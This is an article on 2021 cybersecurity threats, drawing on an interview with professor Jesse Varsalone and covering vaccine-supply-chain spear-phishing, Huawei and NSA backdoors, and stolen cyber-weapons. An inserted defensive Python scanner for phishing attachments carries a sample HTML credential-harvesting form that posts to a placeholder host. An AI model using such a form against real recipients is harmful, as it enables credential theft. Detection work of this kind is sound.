Matt Zbrog
As computers, smartphones, and networks have become more sophisticated, so have the various types of cyberattacks that they face. And an increasing reliance on connected systems means that a disruption in service can have an enormous real-world impact. It’s not just PlayStation logins being hacked anymore, but hospitals, power grids, and nuclear reactors. Even the world’s most advanced cybersecurity agencies have themselves become targets of attack.
Cybersecurity is a major priority for the US in 2021 and beyond. According to the Bureau of Labor Statistics, the need for information systems analysts is set to grow 31 percent between 2019 and 2029, making it one of the fastest-growing occupations in the nation.
To defend against increasingly sophisticated cyber-threats, those cybersecurity professionals will need to be up-to-date on the field’s most pressing issues.
Jesse Varsalone is an associate professor of computer networks and cybersecurity at the University of Maryland Global Campus (UMGC). He’s also the academic advisor to the award-winning UMGC Cyber Competition Team.
Prior to joining the faculty at UMGC, Varsalone spent five years as an instructor for the Defense Cyber Investigations Training Academy (DCITA), where he was a member of the network intrusions track. Varsalone has written and contributed to several cybersecurity publications, including the book Defense Against the Black Arts: How Hackers Do What They Do, and How to Protect Against It.
By the time you’ve wrapped your head around the most recent major cyberattack, there’s probably already been another. One part of the job of a cybersecurity professional is to stay abreast of all those attacks, sometimes analyzing them as if they were case studies in a textbook. But even Varsalone admits he can’t always keep up.
“It’s been really crazy with all the hacks this year,” Varsalone says. “It’s been non-stop basically.”
Part of the reason for that is purely mathematical: as the number of technological devices on a network increases, so does the number of hypothetical vulnerabilities. Companies are rushing to market their devices, quickly amassing users, and only realizing later that they’ve neglected to properly secure everything.
“One mistake is all you need,” Varsalone says. “One mistake can really hurt you.”
The Covid-19 pandemic has exacerbated the situation. Suddenly, millions of Americans are logging on to work and school from home, and very few of them are well-read in proper data hygiene and other cybersecurity practices.
“Cyberattacks will continue to proliferate over the next couple of months, with the big emphasis on everyone working from home,” Varsalone says. “Information technology (IT) was important before the pandemic hit, but now it’s critical. It’s as critical as power and water.”
For those just beginning their cybersecurity education or career, Varsalone recommends focusing on fundamentals. That doesn’t mean programming and coding (which are helpful, but not essential).
Instead, it means understanding operating systems like Windows, Linux, and macOS. It means studying (and utilizing) cloud-based services like AWS and Azure. It means being comfortable and familiar with each device on a network, and how those devices interoperate. But the focus on more and more security isn’t always correct.
“The more we ramp up the security, the less usable the technology is,” Varsalone says. “It can get to the point where it’s so secure, it’s almost unusable. We have to find a balance. We need things that are very secure that are still easy to use.”
Varsalone has experience playing both offense and defense in the cybersecurity world. And while he sees the number of attacks going up in the near future, he remains optimistic about the good guys’ chances in the long term.
“There’s going to be a lot of good job opportunities for people in cybersecurity, and there are a lot of good quality people out there,” Varsalone says. “Companies just have to hire them, and they have to spend a lot of money on cybersecurity, and take it very seriously. When that happens, we might not think in gloom and doom. We’ll be able to look positively towards the future.”
In the coming years, the US faces innumerable cyberthreats, both large and small. To get a look at three of the most concerning for 2021, read on.
In December 2020, IBM’s X-Force discovered a series of ongoing cyberattacks against companies and organizations that were in the supply chain for coronavirus vaccines. Together with the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), the analysts uncovered a global spear-phishing campaign dating back to September.
Spear-phishing is an extremely precise version of phishing that targets specific individuals for their access to networks and information. Here, the attackers targeted high-level executives who dealt specifically with the cooling process necessary for storing and transferring doses of the vaccine. The victims received emails that posed as official documents but carried malicious HTML attachments that asked the recipient to enter their credentials. By delivering those malicious documents as local attachments instead of published web pages, the attackers avoided discovery by the routine sweeps of security research teams. IBM’s X-Force believes the motive was to harvest information that would aid further access in the future.
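The pattern described above, a credential form hidden in an HTML attachment rather than on a hosted page, is something a mail gateway or analyst can check for directly. The following is an added example (not code from the article, IBM, or CISA) that parses an email message with the Python standard library, looks only at parts delivered as HTML attachments, and flags any that contain a password field, reporting where the form would post. The sample message, its addresses, filename, and domain are constructed placeholders, not indicators from the campaign.

```python
"""Flag email attachments that look like credential-harvesting forms.

Added example, not from the article: a defender-side check for an HTML
file attached to a message that asks the recipient to type credentials.
Uses only the Python standard library.
"""
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample message: a fake "document" attachment that renders a
# login form posting to a third-party host. All names and domains here are
# placeholders made up for this example.
SAMPLE_EML = """\
From: "Procurement" <procurement@example.invalid>
To: exec@refrigeration.example
Subject: RFP - cold chain storage
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="utf-8"

Please review the attached request for proposal.

--BOUNDARY
Content-Type: text/html; name="RFP-2020.html"
Content-Disposition: attachment; filename="RFP-2020.html"

<html><body>
<form action="https://collector.example.invalid/post" method="post">
  Email: <input type="text" name="user">
  Password: <input type="password" name="pass">
  <input type="submit" value="Open document">
</form>
</body></html>
--BOUNDARY--
"""


class CredentialFormScanner(HTMLParser):
    """Collects form targets and notes whether a password field is present."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password_field = True


def scan_html(html_text):
    """Return (has_password_field, form_actions) for one HTML blob."""
    scanner = CredentialFormScanner()
    scanner.feed(html_text)
    return scanner.has_password_field, scanner.form_actions


def find_credential_forms(raw_eml):
    """Return one finding per suspicious attachment in the message.

    Heuristic: a part delivered as an HTML attachment (not the inline body)
    that contains a password input. A genuine RFP or invoice has no reason
    to ask for a password, so this is a cheap, high-signal check.
    """
    msg = message_from_string(raw_eml)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        is_attachment = part.get_content_disposition() == "attachment"
        is_html = part.get_content_type() == "text/html"
        if not (is_attachment and is_html):
            continue
        payload = part.get_payload(decode=True).decode("utf-8", "replace")
        has_password, actions = scan_html(payload)
        if has_password:
            findings.append({"filename": part.get_filename(),
                             "form_actions": actions})
    return findings


if __name__ == "__main__":
    for finding in find_credential_forms(SAMPLE_EML):
        print(f"suspicious attachment {finding['filename']}: "
              f"form posts to {finding['form_actions']}")
```

Because the check runs on the attachment bytes rather than on a URL, it still fires when the form is never published anywhere, which is exactly the property that let the campaign's attachments slip past web-based sweeps. In production the same logic would sit behind a gateway or SIEM enrichment step and would also record the form's target host for blocking and correlation.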
The group responsible for the attack remains unclear, but analysts say the scheme has all the hallmark characteristics of a nation-sponsored cyberattack. The precise targeting of the spear-phishing scheme suggests a dedicated and disciplined approach to intelligence gathering, and the lack of an immediate ‘payout’ from any successful attack in this scenario seems to exclude the involvement of more independent play-for-pay hackers. Nation-states, however, are much more interested in information that directly affects the global economy, as coronavirus vaccines do.
Spear-phishing attacks are dangerous because they bypass the technical infrastructure and instead target non-cybersecurity personnel. We live in a world where someone who works at a company that specializes in refrigeration may have information that, in the wrong hands, could harm or hinder huge shipments of life-saving vaccines. Does that person know the difference between a genuine request for proposal (RFP) and an expertly-researched but fabricated one? Cybersecurity is increasingly becoming everyone’s concern.
The rollout of 5G is a double-edged sword for cybersecurity, offering more complex encryption features while also exposing new points of vulnerability through the internet of things (IoT).
But before 5G goes mainstream, there’s another concern. Huawei, a Chinese technology company with the largest market share of 5G infrastructure, has been accused of having backdoors installed in its technology. Hypothetically, those backdoors would allow the company—or the Chinese government—to listen in on private, and potentially classified, conversations. Does that sound paranoid? Or does it sound familiar?
In the US, the National Security Agency began listening in on encrypted internet traffic that ran through Cisco’s hardware and software starting in 2002 and continued to do so for the better part of a decade. The story didn’t break until Edward Snowden’s revelations of 2013, and cybersecurity experts didn’t have a clearer picture of how the NSA did what it did with regard to Cisco until a group known as the Shadow Brokers leaked details about NSA operations and methods in 2016.
According to independent analysis of the data exposed in that hack, the NSA had been using a specialized tool called BenignCertain to exploit a weakness in Cisco’s Internet Key Exchange (IKE) implementation, extract encryption keys, and read otherwise secure data transmitted through Cisco’s virtual private networks (VPNs). While this isn’t quite the same level of impropriety as is alleged against Huawei—with Huawei, the backdoors are said to be intentional—unintentional backdoors in software and hardware represent a major threat.
One way to mitigate that threat is with greater transparency. Most of today’s telecom networks use proprietary technology, but there’s a growing trend for a more open-source approach to code and hardware. Transparency makes it easier for cybersecurity professionals to spot back doors and patch other exploitable weaknesses. Most of the internet uses open-source software as it is—and telecommunication will eventually, hopefully, follow suit.
Some things shouldn’t be open source. While it’s already morally dubious for government agencies to spy on citizens through corporate exploits and backdoors, it’s outright dangerous when the tools they use are commandeered by bad actors. That was the case in 2016 when the Shadow Brokers auctioned off the NSA’s high-powered cyber weapons.
Beyond the ethical concerns of an American agency spying on citizens through corporate means are the more practical worries associated with other entities using cybersecurity tools for truly nefarious purposes. When the Shadow Brokers got hold of the NSA’s cyber weapons in 2016 and proceeded to auction them off to the highest bidders, it was the digital equivalent of having a high-tech armory raided, with the ill-gotten gains pawned off to those who could profit from it most. Those tools were eventually used in attacks against hospitals, government agencies, and conglomerates, causing damages that cost an estimated $10 billion.
It’s not just government agencies that are vulnerable. In December 2020, FireEye, an elite $3.5 billion cybersecurity firm, was hacked by what was likely a team of nation-state actors. The heist targeted the firm’s Red Team tools: highly advanced cyber-weapons that are meant to simulate cyberattacks and test a system’s vulnerabilities.
While FireEye has now made key parts of the compromised tools available online to help potential victims deter attacks, the danger remains: bad actors can still use the stolen tools, and enjoy a certain level of anonymity in doing so.
Anti-proliferation groups have long dealt with securing high-powered weapons technology such as missile guidance systems and nuclear reactor components. But cyber-weapons are weightless, native to the digital sphere, and spread across the public and private sectors. Anti-proliferation requires a newer, more cyber-minded approach.
Matt Zbrog
Matt Zbrog is a writer and researcher from Southern California. Since 2018, he’s written extensively about the increasing digitization of investigations, the growing importance of forensic science, and emerging areas of investigative practice like open source intelligence (OSINT) and blockchain forensics. His writing and research are focused on learning from those who know the subject best, including leaders and subject matter specialists from the Association of Certified Fraud Examiners (ACFE) and the American Academy of Forensic Science (AAFS). As part of the Big Employers in Forensics series, Matt has conducted detailed interviews with forensic experts at the ATF, DEA, FBI, and NCIS.